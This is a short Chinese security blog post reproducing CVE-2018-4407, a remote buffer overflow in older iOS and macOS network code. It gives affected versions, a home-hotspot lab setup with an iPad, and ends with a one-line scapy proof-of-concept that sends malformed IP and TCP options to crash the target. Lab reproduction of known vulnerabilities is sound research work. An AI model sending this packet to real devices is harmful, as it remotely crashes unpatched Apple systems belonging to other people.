CVE-2018-4407(IOS缓冲区溢出漏洞复现)

  • A+
所属分类:安全文章

环境:用手机开启的热点,pc本一台,ipad一台

pc电脑:192.168.43.30

ipad:192.168.43.145

影响版本

Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)

Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)

Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复)

Apple OS X El Capitan及更早版本:所有设备

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

如图,将pc跟ipad运行在同一个网下

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

安装scapy模块

pip install scapy

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

执行脚本程序

python cve-2018-4407.py

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

最后给大家一个ipad的测试截图

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

最后poc肯定是要发出来的呀~

#pip install scapy

import scapy

from scapy.all import *

 

send(IP(dst="192.168.43.145",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))

如需转载,请注明原文出处!!!

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

2018/1/11  

ian

本文始发于微信公众号(零组攻防实验室):CVE-2018-4407(IOS缓冲区溢出漏洞复现)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: